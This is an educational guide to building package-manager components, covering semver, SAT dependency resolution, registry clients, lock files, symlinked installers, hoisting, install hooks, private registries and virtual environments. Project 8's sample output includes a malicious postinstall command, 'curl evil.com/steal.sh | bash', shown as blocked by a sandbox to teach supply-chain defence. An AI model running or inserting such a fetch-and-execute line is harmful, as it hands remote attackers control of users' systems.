PACKAGE MANAGER INTERNALS PROJECTS
Package Manager Internals: From Magic to Mastery
Goal: Understand how package managers (npm, Cargo, Homebrew, pip) work by building progressively complex components that exercise each fundamental concept.
Core Concepts You’ll Master
Package managers solve several interconnected problems:
- Version Parsing & Comparison - Understanding semver, comparing
1.2.3vs1.2.4-beta.1 - Constraint Satisfaction - Finding versions that satisfy
^1.2.0AND>=1.1.5 <2.0.0 - Dependency Resolution - The NP-complete problem of finding compatible versions for an entire graph
- Registry Protocols - HTTP APIs, package metadata (“packuments”), tarballs
- Lock Files - Reproducible builds, integrity hashes
- Installation & Linking - Cellar/node_modules structures, symlinks, PATH management
- Caching - Avoiding re-downloads, content-addressable storage
- Security - Checksums, signatures, supply chain integrity
Project 1: Semver Parser & Comparator
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: C, Go, TypeScript
- Coolness Level: Level 2: Practical but Forgettable
- Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
- Difficulty: Level 2: Intermediate
- Knowledge Area: Parsing / String Processing
- Software or Tool: Semver Library
- Main Book: “Language Implementation Patterns” by Terence Parr
What you’ll build: A complete semver library that parses version strings (1.2.3-alpha.1+build.456), compares them, and evaluates range constraints (^1.2.0, >=1.0.0 <2.0.0, ~1.2.3).
Why it teaches package managers: Every package manager operation starts with parsing and comparing versions. When npm decides whether lodash@4.17.21 satisfies ^4.0.0, it’s using exactly this logic. You’ll understand why 1.0.0-alpha < 1.0.0 and how pre-release identifiers work.
Core challenges you’ll face:
- Tokenizing version strings (split on
.,-,+) → maps to lexical analysis - Handling pre-release precedence (
1.0.0-alpha.1vs1.0.0-alpha.2vs1.0.0) → maps to comparison algorithms - Parsing range expressions (
>=1.2.0 <2.0.0 || 3.x) → maps to recursive descent parsing - Operator semantics (difference between
^,~,>=,*) → maps to domain modeling
Key Concepts:
- Lexical Analysis: “Language Implementation Patterns” Chapter 2 - Terence Parr
- Semantic Versioning Spec: semver.org specification - Official Spec
- Comparison Algorithms: “Algorithms, Fourth Edition” Chapter 2 (Sorting) - Sedgewick & Wayne
- Recursive Descent Parsing: “Writing a C Compiler” Chapter 1 - Nora Sandler
Difficulty: Intermediate Time estimate: Weekend Prerequisites: Basic parsing concepts, string manipulation
Real world outcome:
$ ./semver compare 1.2.3 1.2.4
1.2.3 < 1.2.4
$ ./semver satisfies 1.2.3 "^1.0.0"
✓ 1.2.3 satisfies ^1.0.0
$ ./semver satisfies 2.0.0 "^1.0.0"
✗ 2.0.0 does NOT satisfy ^1.0.0 (major version mismatch)
$ ./semver parse 1.2.3-alpha.1+build.456
Version {
major: 1,
minor: 2,
patch: 3,
prerelease: ["alpha", 1],
build: ["build", 456]
}
Implementation Hints:
- Start by parsing just
X.Y.Zbefore handling pre-release/build metadata - The range operators have specific meanings:
^allows minor/patch changes,~allows only patch changes,*andxare wildcards - Pre-release versions have lower precedence than the associated normal version
- Build metadata should be ignored when comparing versions (per spec section 10)
Learning milestones:
- Parse and compare basic versions → You understand tokenization
- Handle pre-release ordering correctly → You understand semver semantics
- Evaluate complex range expressions → You can build expression parsers
Project 2: Dependency Graph Builder & Cycle Detector
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Python
- Alternative Programming Languages: Rust, Go, TypeScript
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
- Difficulty: Level 2: Intermediate
- Knowledge Area: Graph Algorithms / Data Structures
- Software or Tool: Dependency Analyzer
- Main Book: “Algorithms, Fourth Edition” by Robert Sedgewick and Kevin Wayne
What you’ll build: A tool that reads package manifest files (package.json, Cargo.toml, or your own format), builds a directed dependency graph, detects cycles, and outputs a topological installation order.
Why it teaches package managers: Before resolving versions, package managers must understand the shape of dependencies. Circular dependencies are forbidden (or require special handling). Installation must happen in dependency order—you can’t build express before its dependencies exist.
Core challenges you’ll face:
- Parsing manifest files (JSON/TOML) → maps to file I/O and parsing
- Building adjacency lists (package → [dependencies]) → maps to graph representation
- DFS-based cycle detection (finding back edges) → maps to graph traversal
- Topological sorting (installation order) → maps to graph algorithms
- Transitive dependency expansion (A→B→C means A needs C) → maps to graph closure
Key Concepts:
- Graph Representations: “Algorithms, Fourth Edition” Chapter 4.1 - Sedgewick & Wayne
- Depth-First Search: “Algorithms, Fourth Edition” Chapter 4.1 - Sedgewick & Wayne
- Topological Sort: “Algorithms, Fourth Edition” Chapter 4.2 - Sedgewick & Wayne
- Cycle Detection: “Grokking Algorithms” Chapter 6 - Aditya Bhargava
Difficulty: Intermediate Time estimate: Weekend Prerequisites: Basic graph theory, DFS/BFS understanding
Real world outcome:
$ ./depgraph analyze ./my-project
Dependency Graph:
my-app
├── express@^4.0.0
│ ├── body-parser@^1.0.0
│ │ └── bytes@^3.0.0
│ └── accepts@^1.0.0
└── lodash@^4.17.0
Total packages: 5
Max depth: 3
$ ./depgraph check-cycles ./circular-project
⚠️ Circular dependency detected!
package-a → package-b → package-c → package-a
$ ./depgraph install-order ./my-project
Installation order:
1. bytes@^3.0.0
2. body-parser@^1.0.0
3. accepts@^1.0.0
4. lodash@^4.17.0
5. express@^4.0.0
6. my-app
Implementation Hints:
- Use a dictionary/hashmap where keys are package names and values are lists of dependency names
- For cycle detection, maintain three states during DFS: unvisited, in-progress, completed
- A cycle exists if you visit a node that’s currently “in-progress” (a back edge)
- Topological sort is just the reverse of DFS post-order traversal
- Consider using Kahn’s algorithm (BFS-based) as an alternative approach
Learning milestones:
- Build and visualize dependency graphs → You understand graph representation
- Detect circular dependencies → You understand DFS traversal states
- Generate correct installation order → You understand topological sorting
Project 3: Version Constraint SAT Solver
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Python
- Alternative Programming Languages: Rust, Haskell, OCaml
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
- Difficulty: Level 4: Expert
- Knowledge Area: Constraint Satisfaction / Logic
- Software or Tool: Dependency Resolver
- Main Book: “The Art of Computer Programming, Volume 4, Fascicle 6: Satisfiability” by Donald E. Knuth
What you’ll build: A dependency resolver that translates version constraints into boolean satisfiability (SAT) clauses and uses a solver (either your own DPLL implementation or an off-the-shelf solver like PicoSAT) to find compatible versions.
Why it teaches package managers: This is the heart of modern package managers. When you have A requires B>=1.0.0 and C requires B<1.5.0 and D requires B>=1.3.0, finding B@1.4.0 is a SAT problem. Understanding this reveals why “dependency hell” is NP-complete and why resolvers sometimes take a long time.
Core challenges you’ll face:
- Encoding constraints as CNF (Conjunctive Normal Form) → maps to propositional logic
- At-most-one constraints (only one version of each package) → maps to cardinality constraints
- Implementing DPLL algorithm (unit propagation, pure literal elimination) → maps to backtracking search
- Conflict analysis and learning (why did this fail?) → maps to debugging resolution failures
- Extracting solutions (boolean assignment → version selection) → maps to solution decoding
Resources for key challenges:
- Dependency Resolution Made Simple - Fernando Borretti’s practical guide to SAT-based resolution
- Version SAT - Russ Cox’s analysis of why version selection is NP-complete
- Software Design by Example: Package Manager - Step-by-step tutorial building a resolver
Key Concepts:
- SAT Problem Definition: “The Art of Computer Programming, Vol 4 Fascicle 6” - Donald Knuth
- DPLL Algorithm: Wikipedia: DPLL Algorithm - Classic backtracking SAT solver
- CNF Conversion: “Concrete Mathematics” Chapter 4 - Graham, Knuth, Patashnik
- Constraint Propagation: “Algorithms, Fourth Edition” Chapter 6 (Context) - Sedgewick & Wayne
Difficulty: Expert Time estimate: 2-4 weeks Prerequisites: Propositional logic, backtracking algorithms, semver (Project 1)
Real world outcome:
$ cat requirements.txt
web-framework >= 2.0.0
database-driver ^1.5.0
logger >= 1.0.0 < 3.0.0
# web-framework 2.0.0 requires logger ^2.0.0
# database-driver 1.5.0 requires logger >= 1.5.0
$ ./resolver solve requirements.txt
Resolving dependencies...
- web-framework: 6 versions available
- database-driver: 4 versions available
- logger: 12 versions available
Encoding as SAT problem...
- 22 variables (one per package-version pair)
- 156 clauses
Running DPLL solver...
- Propagations: 47
- Decisions: 3
- Conflicts: 1
- Learned clauses: 1
✓ Solution found:
web-framework@2.1.0
database-driver@1.5.2
logger@2.3.0
$ ./resolver solve impossible-requirements.txt
✗ No solution exists!
Conflict: web-framework@2.0.0 requires logger>=2.0.0
but old-lib@1.0.0 requires logger<2.0.0
Implementation Hints:
- Start with a brute-force solver (try all combinations) before optimizing with DPLL
- Each package-version pair becomes a boolean variable (e.g.,
lodash_4_17_0) - “At most one version per package” becomes pairwise exclusion clauses:
¬lodash_4_17_0 ∨ ¬lodash_4_16_0 - Dependencies become implications:
express_4_0_0 → (body_parser_1_0_0 ∨ body_parser_1_1_0 ∨ ...) - Consider using Python’s
python-satlibrary for a production solver, but implement basic DPLL yourself first
Learning milestones:
- Encode simple constraints as SAT → You understand the reduction
- Implement basic DPLL with unit propagation → You understand SAT solving
- Handle conflicts and report useful errors → You understand why resolution fails
- Solve real-world dependency graphs quickly → You understand optimization
Project 4: Package Registry Client
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Go
- Alternative Programming Languages: Rust, Python, TypeScript
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
- Difficulty: Level 2: Intermediate
- Knowledge Area: Networking / HTTP APIs
- Software or Tool: npm/crates.io Client
- Main Book: “TCP/IP Illustrated, Volume 1” by W. Richard Stevens
What you’ll build: A client that talks to the npm registry (or crates.io) to fetch package metadata, download tarballs, verify checksums, and cache results locally.
Why it teaches package managers: This is how npm install actually gets packages. You’ll learn the registry protocol, understand why there’s both a “full” and “abbreviated” metadata format, and see how checksums ensure integrity.
Core challenges you’ll face:
- HTTP client with proper headers (User-Agent, Accept) → maps to protocol compliance
- Parsing “packument” JSON (package metadata format) → maps to API schemas
- Downloading and extracting tarballs (.tgz files) → maps to file formats
- Verifying SHA-512 integrity hashes → maps to security
- Implementing a local cache (avoid re-downloads) → maps to caching strategies
Resources for key challenges:
- npm Registry API Documentation - Official npm API spec
- Exploring the npm Registry API - Practical walkthrough
Key Concepts:
- HTTP Protocol: “TCP/IP Illustrated, Volume 1” Chapter 14 - W. Richard Stevens
- REST API Design: “Design and Build Great Web APIs” Chapter 3 - Mike Amundsen
- Checksums & Integrity: “Serious Cryptography, 2nd Edition” Chapter 5 - Jean-Philippe Aumasson
- Caching Strategies: “Designing Data-Intensive Applications” Chapter 5 - Martin Kleppmann
Difficulty: Intermediate Time estimate: 1 week Prerequisites: HTTP basics, JSON parsing, file I/O
Real world outcome:
$ ./registry-client info lodash
Package: lodash
Latest: 4.17.21
Description: Lodash modular utilities
License: MIT
Repository: https://github.com/lodash/lodash
Versions: 114 published
$ ./registry-client download lodash 4.17.21
Fetching metadata from https://registry.npmjs.org/lodash
Found version 4.17.21
Tarball: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Size: 308,599 bytes
SHA-512: CAMj...
Downloading... [████████████████████] 100%
Verifying integrity...
Expected: sha512-CAMj...
Actual: sha512-CAMj...
✓ Integrity verified
Extracting to ./cache/lodash-4.17.21/
✓ 1,057 files extracted
$ ./registry-client search "http client"
Results for "http client":
1. axios (104M weekly downloads) - Promise based HTTP client
2. node-fetch (67M weekly downloads) - A light-weight module
3. got (23M weekly downloads) - Human-friendly HTTP request library
Implementation Hints:
- The npm registry base URL is
https://registry.npmjs.org - Fetch metadata with
GET /package-name(full) orGET /package-name/version(specific version) - The
distfield in version metadata containstarballURL andintegrityhash - Use
Accept: application/vnd.npm.install-v1+jsonheader for abbreviated metadata - For crates.io, the protocol is different—it uses a git-based index at
https://github.com/rust-lang/crates.io-index - Implement ETag-based caching to avoid re-downloading unchanged metadata
Learning milestones:
- Fetch and parse package metadata → You understand the registry protocol
- Download and verify tarballs → You understand integrity checking
- Implement caching with ETags → You understand efficient API usage
Project 5: Lock File Generator
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: Go, Python, TypeScript
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
- Difficulty: Level 3: Advanced
- Knowledge Area: Reproducible Builds / Hashing
- Software or Tool: Lock File System
- Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann
What you’ll build: A system that, after dependency resolution, generates a lock file recording exact versions, download URLs, and integrity hashes—then can reinstall from the lock file without re-resolving.
Why it teaches package managers: Lock files are why npm ci and cargo build are deterministic. Without them, builds are non-reproducible. You’ll understand the difference between “loose” requirements (package.json) and “locked” reality (package-lock.json).
Core challenges you’ll face:
- Capturing resolved state (exact versions, not ranges) → maps to state serialization
- Recording integrity hashes (SHA-512 for each package) → maps to content-addressable storage
- Detecting lock file staleness (manifest changed since lock) → maps to change detection
- Partial updates (add one package without re-resolving everything) → maps to incremental computation
- Cross-platform reproducibility (same lock file, same result everywhere) → maps to deterministic builds
Key Concepts:
- Content Addressing: “Designing Data-Intensive Applications” Chapter 3 - Martin Kleppmann
- Cryptographic Hashes: “Serious Cryptography, 2nd Edition” Chapter 5 - Aumasson
- Reproducible Builds: reproducible-builds.org - Community standard
- JSON/TOML Serialization: “Fluent Python” Chapter 4 (for concepts) - Luciano Ramalho
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Projects 1-4 (semver, graphs, resolver, registry client)
Real world outcome:
$ cat mypackage.toml
[dependencies]
web-framework = "^2.0.0"
database = "^1.5.0"
$ ./lockgen generate mypackage.toml
Resolving dependencies...
Fetching package metadata...
Generating lock file...
✓ Created mypackage.lock
$ cat mypackage.lock
# Auto-generated lock file. Do not edit.
# Generated: 2025-01-15T10:30:00Z
[[package]]
name = "web-framework"
version = "2.1.3"
source = "https://registry.example.com/web-framework-2.1.3.tgz"
integrity = "sha512-abc123..."
dependencies = ["logger@2.0.0"]
[[package]]
name = "logger"
version = "2.0.0"
source = "https://registry.example.com/logger-2.0.0.tgz"
integrity = "sha512-def456..."
dependencies = []
[[package]]
name = "database"
version = "1.5.2"
source = "https://registry.example.com/database-1.5.2.tgz"
integrity = "sha512-ghi789..."
dependencies = []
$ ./lockgen install --from-lock mypackage.lock
Installing from lock file (no resolution needed)...
✓ logger@2.0.0 (cached)
✓ web-framework@2.1.3 (downloading...)
✓ database@1.5.2 (cached)
All packages installed. Integrity verified.
$ ./lockgen check mypackage.toml mypackage.lock
✓ Lock file is up-to-date with manifest
Implementation Hints:
- The lock file should contain: package name, exact version, download URL, integrity hash, and resolved dependencies
- Use SHA-512 (like npm) or SHA-256 (like Cargo) for integrity hashes
- Detect staleness by hashing the manifest file and storing that hash in the lock file
- For partial updates, only re-resolve the changed subtree of the dependency graph
- Consider supporting both JSON and TOML formats (npm uses JSON, Cargo uses TOML)
Learning milestones:
- Generate lock files after resolution → You understand state capture
- Install purely from lock file → You understand reproducibility
- Detect and handle manifest changes → You understand incremental updates
Project 6: Cellar-Style Package Installer
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: C
- Alternative Programming Languages: Rust, Go, Python
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 3: Advanced
- Knowledge Area: Filesystem / Symlinks
- Software or Tool: Package Installer (Homebrew-style)
- Main Book: “The Linux Programming Interface” by Michael Kerrisk
What you’ll build: An installer that extracts packages into versioned directories (like Homebrew’s Cellar: /usr/local/Cellar/pkg/1.2.3/) and creates symlinks to a common prefix (/usr/local/bin/), supporting multiple versions and atomic switching.
Why it teaches package managers: This is how Homebrew achieves clean installs, easy rollbacks, and multiple versions. You’ll understand why symlinks are powerful, how PATH works, and why “just copying files” isn’t enough.
Core challenges you’ll face:
- Versioned directory structure (Cellar layout) → maps to filesystem organization
- Creating relative symlinks (portable across machines) → maps to symlink mechanics
- Atomic version switching (switch from v1.0 to v2.0 safely) → maps to atomic operations
- Handling conflicts (two packages provide same binary) → maps to conflict resolution
- Uninstallation without orphans (clean removal) → maps to reference tracking
Key Concepts:
- Symlinks & Hard Links: “The Linux Programming Interface” Chapter 18 - Michael Kerrisk
- Atomic File Operations: “The Linux Programming Interface” Chapter 5 - Michael Kerrisk
- Filesystem Hierarchy: “How Linux Works, 3rd Edition” Chapter 4 - Brian Ward
- Homebrew Architecture: Formula Cookbook - Official docs
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Filesystem operations, symlink concepts, shell/PATH understanding
Real world outcome:
$ ./cellar install ./packages/vim-9.0.0.tgz
Installing vim@9.0.0...
Creating /usr/local/Cellar/vim/9.0.0/
Extracting 127 files...
Linking vim@9.0.0...
/usr/local/bin/vim → ../Cellar/vim/9.0.0/bin/vim
/usr/local/bin/vimdiff → ../Cellar/vim/9.0.0/bin/vimdiff
/usr/local/share/man/man1/vim.1 → ../../Cellar/vim/9.0.0/share/man/man1/vim.1
✓ vim@9.0.0 installed and linked
$ ls -la /usr/local/bin/vim
lrwxr-xr-x 1 user staff ../Cellar/vim/9.0.0/bin/vim
$ ./cellar install ./packages/vim-9.1.0.tgz
Installing vim@9.1.0...
✓ Installed to /usr/local/Cellar/vim/9.1.0/
Switching vim 9.0.0 → 9.1.0...
Unlinking 9.0.0...
Linking 9.1.0...
✓ Switched
$ ./cellar list
vim 9.0.0 (unlinked)
vim 9.1.0 (linked) ✓
$ ./cellar switch vim 9.0.0
Switching vim 9.1.0 → 9.0.0...
✓ Now using vim@9.0.0
$ ./cellar uninstall vim 9.0.0
Uninstalling vim@9.0.0...
Removing /usr/local/Cellar/vim/9.0.0/ (127 files)
✓ Removed
Implementation Hints:
- Cellar structure:
$PREFIX/Cellar/$NAME/$VERSION/{bin,lib,share,...} - Always use relative symlinks (
../Cellar/...) not absolute (/usr/local/Cellar/...) for portability - Use
symlink()system call (or language equivalent) to create links - For atomic switching, create new links with temporary names, then
rename()over old links - Track installed files in a manifest (e.g.,
/Cellar/vim/9.0.0/.MANIFEST) for clean uninstall - Handle the case where
/usr/local/bin/doesn’t exist yet
Learning milestones:
- Install to versioned directories → You understand Cellar structure
- Create and manage symlinks → You understand the linking layer
- Atomically switch versions → You understand transactional installs
- Clean uninstall with no orphans → You understand reference tracking
Project 7: node_modules Hoisting Simulator
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: TypeScript
- Alternative Programming Languages: Python, Go, Rust
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
- Difficulty: Level 3: Advanced
- Knowledge Area: Tree Algorithms / Package Layout
- Software or Tool: npm/pnpm Simulator
- Main Book: “Data Structures the Fun Way” by Jeremy Kubica
What you’ll build: A tool that takes a resolved dependency graph and produces an optimized node_modules layout, demonstrating npm’s hoisting algorithm and pnpm’s content-addressable approach.
Why it teaches package managers: npm’s node_modules structure is famously complex. Why is it often 500MB? Why do you sometimes get duplicate packages? Why does pnpm use symlinks differently? This project reveals the tradeoffs.
Core challenges you’ll face:
- Hoisting algorithm (move deps up when possible) → maps to tree optimization
- Handling duplicate versions (when hoisting fails) → maps to space vs correctness tradeoff
- Phantom dependencies (accessing unhoisted packages) → maps to encapsulation violations
- pnpm’s content-addressable store (hardlinks to global cache) → maps to deduplication
- Flat vs nested layouts (yarn vs npm v2 vs npm v7) → maps to algorithm comparison
Key Concepts:
- Tree Traversal: “Data Structures the Fun Way” Chapter 6 - Jeremy Kubica
- npm Hoisting: npm docs: how npm3 works - Official npm docs
- pnpm’s Approach: pnpm.io/motivation - Why pnpm exists
- Content-Addressable Storage: “Designing Data-Intensive Applications” Chapter 3 - Martin Kleppmann
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Tree data structures, npm/node basics
Real world outcome:
$ cat resolved-deps.json
{
"my-app": {
"deps": {
"express": "4.18.0",
"lodash": "4.17.21"
}
},
"express": {
"deps": {
"body-parser": "1.20.0",
"lodash": "4.17.21"
}
},
"body-parser": {
"deps": {
"lodash": "4.17.15"
}
}
}
$ ./hoister simulate --algorithm=npm resolved-deps.json
npm-style Layout (hoisted):
node_modules/
├── express/
├── lodash/ (4.17.21, hoisted)
├── body-parser/
│ └── node_modules/
│ └── lodash/ (4.17.15, nested - conflicts with hoisted)
└── .package-lock.json
Analysis:
Total packages: 4
Hoisted: 3
Nested duplicates: 1 (lodash has conflicting versions)
Disk usage: ~2.1 MB
$ ./hoister simulate --algorithm=pnpm resolved-deps.json
pnpm-style Layout (symlinks + store):
node_modules/
├── .pnpm/
│ ├── express@4.18.0/
│ │ └── node_modules/
│ │ ├── express/ → <hardlink to store>
│ │ ├── body-parser/ → ../../body-parser@1.20.0/...
│ │ └── lodash/ → ../../lodash@4.17.21/...
│ ├── body-parser@1.20.0/
│ │ └── node_modules/
│ │ ├── body-parser/ → <hardlink to store>
│ │ └── lodash/ → ../../lodash@4.17.15/...
│ ├── lodash@4.17.21/
│ └── lodash@4.17.15/
├── express/ → .pnpm/express@4.18.0/node_modules/express
└── lodash/ → .pnpm/lodash@4.17.21/node_modules/lodash
Analysis:
Total packages: 4
Store entries: 4 (deduplicated globally)
Disk usage: ~1.8 MB (shared across projects)
No phantom dependency access possible ✓
Implementation Hints:
- npm hoisting: for each package, try to place it at the highest possible level where no version conflict exists
- A conflict occurs when two versions of the same package would occupy the same path
- pnpm creates a flat store (
.pnpm/name@version/) and symlinks from nestednode_modules - The key insight: pnpm’s layout enforces that packages can only access their declared dependencies
- Consider also implementing Yarn’s plug’n’play (PnP) layout which avoids
node_modulesentirely
Learning milestones:
- Implement basic hoisting → You understand npm’s approach
- Handle version conflicts correctly → You understand why duplicates exist
- Implement pnpm’s symlink layout → You understand the alternative
- Compare disk usage and access patterns → You understand the tradeoffs
Project 8: Build Script Executor (Pre/Post Install Hooks)
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Go
- Alternative Programming Languages: Rust, Python, Node.js
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 3. The “Service & Support” Model
- Difficulty: Level 3: Advanced
- Knowledge Area: Process Management / Security
- Software or Tool: Install Hook Runner
- Main Book: “The Linux Programming Interface” by Michael Kerrisk
What you’ll build: A sandboxed executor for package install scripts (preinstall, postinstall, etc.) that runs build commands, handles native compilation, and implements security policies.
Why it teaches package managers: Many packages need to compile native extensions (like node-gyp for C++ addons) or run setup scripts. This is also a major security vector—malicious packages have used postinstall scripts for attacks. You’ll understand both the necessity and the danger.
Core challenges you’ll face:
- Running child processes (spawn, wait, capture output) → maps to process management
- Environment variable setup (PATH, npm_config_, etc.) → maps to *environment configuration
- Handling native builds (detecting compiler, platform-specific flags) → maps to build systems
- Sandboxing for security (limit filesystem/network access) → maps to security policies
- Timeout and resource limits (prevent runaway scripts) → maps to resource management
Key Concepts:
- Process Creation: “The Linux Programming Interface” Chapter 24-26 - Michael Kerrisk
- Environment Variables: “The Linux Programming Interface” Chapter 6 - Michael Kerrisk
- Sandboxing: “Linux Basics for Hackers” Chapter 14 - OccupyTheWeb
- Supply Chain Security: Socket.dev blog on npm security - Current research
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Process management, shell scripting, security basics
Real world outcome:
$ cat package.json
{
"name": "native-addon",
"scripts": {
"preinstall": "echo 'Checking system requirements...'",
"install": "node-gyp rebuild",
"postinstall": "node ./setup.js"
}
}
$ ./script-runner execute ./package.json --phase=install
[preinstall] Running: echo 'Checking system requirements...'
[preinstall] Checking system requirements...
[preinstall] ✓ Completed in 0.01s
[install] Running: node-gyp rebuild
[install] Setting up environment...
[install] CC=/usr/bin/clang
[install] CXX=/usr/bin/clang++
[install] npm_config_node_gyp=/usr/local/lib/node_modules/node-gyp
[install] Compiling native addon...
[install] gyp info spawn clang++
[install] gyp info spawn args ['-fPIC', '-shared', '-o', 'build/Release/addon.node', ...]
[install] ✓ Completed in 4.2s
[postinstall] Running: node ./setup.js
[postinstall] Creating configuration file...
[postinstall] ✓ Completed in 0.3s
All scripts completed successfully.
$ ./script-runner execute ./malicious-package --sandbox
[postinstall] Running: curl evil.com/steal.sh | bash
[postinstall] ⚠️ BLOCKED: Network access denied (sandbox policy)
[postinstall] ✗ Script terminated
Security report:
Attempted network connections: 1 (blocked)
Attempted filesystem writes outside package: 0
Recommendation: Review this package before installing with --ignore-scripts
Implementation Hints:
- Use
os/exec(Go),subprocess(Python), orstd::process::Command(Rust) for spawning - Set up environment variables like
npm_package_name,npm_lifecycle_event,PATH(includingnode_modules/.bin) - For sandboxing on Linux, consider using
seccomp,namespaces, or running in a container - On macOS, use
sandbox-execwith a profile that restricts network and filesystem - Implement timeouts with
context.WithTimeout(Go) or similar - Capture both stdout and stderr, stream them with prefixes for visibility
Learning milestones:
- Execute lifecycle scripts in order → You understand npm’s script phases
- Set up proper build environment → You understand native compilation
- Implement basic sandboxing → You understand security concerns
- Handle failures and timeouts gracefully → You understand robustness
Project 9: Private Registry Server
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Go
- Alternative Programming Languages: Rust, Python, TypeScript
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: 4. The “Open Core” Infrastructure
- Difficulty: Level 3: Advanced
- Knowledge Area: HTTP Servers / APIs
- Software or Tool: Private npm/Cargo Registry
- Main Book: “Designing Data-Intensive Applications” by Martin Kleppmann
What you’ll build: A private package registry server compatible with npm or Cargo that can host internal packages, proxy to public registries (with caching), and handle publishing with authentication.
Why it teaches package managers: You’ll understand the server side—how registries store metadata, serve tarballs, handle authentication, and why companies run private registries for proprietary code. This is the complement to Project 4 (registry client).
Core challenges you’ll face:
- Implementing the registry API (GET /package, PUT /-/package) → maps to API design
- Storing package metadata (database or filesystem) → maps to data persistence
- Proxying to upstream registries (npmjs.org) with caching → maps to caching proxies
- Authentication and authorization (tokens, scopes) → maps to security
- Handling package publishing (upload, validate, store) → maps to write APIs
Resources for key challenges:
- Cargo Registry Index - How Cargo’s registry protocol works
- npm Registry API - npm’s protocol specification
Key Concepts:
- HTTP Server Design: “Design and Build Great Web APIs” Chapter 5 - Mike Amundsen
- Caching Proxies: “Designing Data-Intensive Applications” Chapter 5 - Martin Kleppmann
- Authentication Patterns: “Foundations of Information Security” Chapter 7 - Jason Andress
- Content-Addressable Storage: “Designing Data-Intensive Applications” Chapter 3 - Kleppmann
Difficulty: Advanced Time estimate: 2-3 weeks Prerequisites: HTTP server development, database basics, authentication
Real world outcome:
# Start your private registry
$ ./registry-server --port 4873 --storage ./packages --upstream https://registry.npmjs.org
Private Registry Server
Listening: http://localhost:4873
Storage: ./packages (142 cached packages)
Upstream: https://registry.npmjs.org (proxy enabled)
# Configure npm to use your registry
$ npm config set registry http://localhost:4873
# Install a public package (proxied and cached)
$ npm install lodash
[registry] GET /lodash
[registry] Cache miss - proxying to upstream
[registry] Caching lodash@4.17.21 (308KB)
[registry] 200 OK (1.2s)
# Install same package again (served from cache)
$ npm install lodash
[registry] GET /lodash
[registry] Cache hit ✓
[registry] 200 OK (12ms)
# Publish a private package
$ npm publish ./my-internal-lib
[registry] PUT /-/package/my-internal-lib
[registry] Authenticated: token=npm_xxx...
[registry] Validating package...
[registry] Storing my-internal-lib@1.0.0 (24KB)
[registry] 201 Created
# Search private packages
$ curl http://localhost:4873/-/v1/search?text=my-internal
{
"objects": [{
"package": {
"name": "my-internal-lib",
"version": "1.0.0",
"private": true
}
}]
}
Implementation Hints:
- For npm compatibility, implement these endpoints:
GET /:package,GET /:package/:version,PUT /:package,GET /-/v1/search - Store metadata as JSON files:
storage/package-name/package.json - Store tarballs:
storage/package-name/package-name-version.tgz - For proxying, first check local storage, then fetch from upstream and cache
- Use bearer token authentication matching npm’s format
- Consider using SQLite for metadata and filesystem for tarballs for simplicity
Learning milestones:
- Serve package metadata and tarballs → You understand the read API
- Proxy and cache from upstream → You understand caching registries
- Handle publishing with auth → You understand the write API
- Support search and listing → You understand registry discovery
Project 10: Virtual Environment Manager
- File: PACKAGE_MANAGER_INTERNALS_PROJECTS.md
- Main Programming Language: Rust
- Alternative Programming Languages: Go, Python, C
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool” (Solo-Preneur Potential)
- Difficulty: Level 3: Advanced
- Knowledge Area: Environment Isolation / Shells
- Software or Tool: venv/virtualenv Clone
- Main Book: “The Linux Programming Interface” by Michael Kerrisk
What you’ll build: A tool that creates isolated environments with their own bin/, lib/, and package directories, activates/deactivates them by modifying PATH, and ensures packages installed in one env don’t affect another.
Why it teaches package managers: Python’s virtualenv, Ruby’s rbenv, Node’s nvm—all solve the “multiple projects, different versions” problem. You’ll understand how environment isolation actually works (it’s mostly PATH manipulation and symlinks).
Core challenges you’ll face:
- Creating isolated directory structures → maps to filesystem organization
- Generating activation scripts (bash, zsh, fish) → maps to shell integration
- PATH manipulation (prepend env’s bin/) → maps to environment variables
- Isolating package installations (pip install goes to env) → maps to tool configuration
- Detecting current environment (which env am I in?) → maps to state tracking
Key Concepts:
- Environment Variables: “The Linux Programming Interface” Chapter 6 - Michael Kerrisk
- Shell Scripting: “Effective Shell” Chapters 15-20 - Dave Kerr
- Python’s venv: venv documentation - Reference implementation
- PATH Mechanics: “How Linux Works, 3rd Edition” Chapter 2 - Brian Ward
Difficulty: Advanced Time estimate: 1-2 weeks Prerequisites: Shell scripting, environment variables, PATH understanding
Real world outcome:
$ ./venv-manager create myproject --python 3.11
Creating virtual environment 'myproject'...
Base Python: /usr/bin/python3.11
Environment: ~/.venvs/myproject/
Creating directory structure:
✓ ~/.venvs/myproject/bin/
✓ ~/.venvs/myproject/lib/python3.11/site-packages/
✓ ~/.venvs/myproject/include/
Creating symlinks:
